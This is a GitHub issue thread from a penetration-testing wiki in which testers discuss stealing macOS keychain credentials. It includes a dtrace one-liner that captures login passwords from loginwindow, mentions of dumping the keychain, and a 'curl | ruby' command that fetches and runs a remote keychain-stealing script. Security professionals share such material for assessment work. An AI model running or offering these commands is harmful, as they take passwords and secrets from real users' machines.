Comments (5)
This is what I get:
dtrace: invalid probe specifier pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}: pid provider is not installed on this system
😢
System info:
$ uname -a ⏎
Darwin cdecl.local 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64
from pwnwiki.github.io.
@OJ - It was on Twitter so it has to be true!
Seriously though, the first command appears to work on my MBP:
└──> $ sudo dtrace -n 'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}') dtrace: description 'pid$target::SecKeychainLogin:entry' matched 1 probe
And the second (dump the keychain) works too but pops up a "do you want this app to access your keychain" prompt for each cred that is being dumped. I'm VERY sure that users/victims will notice this.
└──> $ uname -a Darwin c02kj19lfft4.home 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64
from pwnwiki.github.io.
hehe yeah sorry mate. I wasn't implying that it was you. I think it might rely on Yosemite (I'm still on Mavericks).
Fun stuff though!
from pwnwiki.github.io.
No worries....good to know where it does/does not work too. I'm on 10.9.5 OS X
from pwnwiki.github.io.
Curl https://raw.githubusercontent.com/erran/keyjacker/master/keyjacker.rb | ruby
Co worker Erran wrote this when he was like 16 or so. Still works pretty well on assessments. Again you need to click allow which means you need gui access but I have pulled that off remotely with vnc. Not super stealthy but gets the job done.
Leon Johnson
On Jun 25, 2015, at 6:48 AM, OJ Reeves [email protected] wrote:
This is what I get:
dtrace: invalid probe specifier pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}: pid provider is not installed on this system
System info:
$ uname -a ⏎
Darwin cdecl.local 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64
—
Reply to this email directly or view it on GitHub.
from pwnwiki.github.io.
Related Issues (20)
- Mimikatz and WCE HOT 3
- Web Servers - Many languages
- Windows Single Liners HOT 3
- results not showing HOT 2
- incorrect information for net commands
- Pentest-WIKI HOT 1
- Need to add Exchange / OWA / Outlook stuff HOT 3
- Unmatched parens --> missing code?
- Add Wordpress under web app technologies HOT 12
- Add blog post content to powershell recon HOT 9
- 2besorted - cats HOT 5
- 2besorted - linux
- 2besorted - osx
- Database backdoors HOT 4
- Find a way to allow users to generate a pdf from a markdown file HOT 1
- Testing Integration - Closing soon
- netsh traffic capture HOT 2
- Add some stuff from n0where about Linux post exploitation HOT 3
- Reverse Shells
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from pwnwiki.github.io.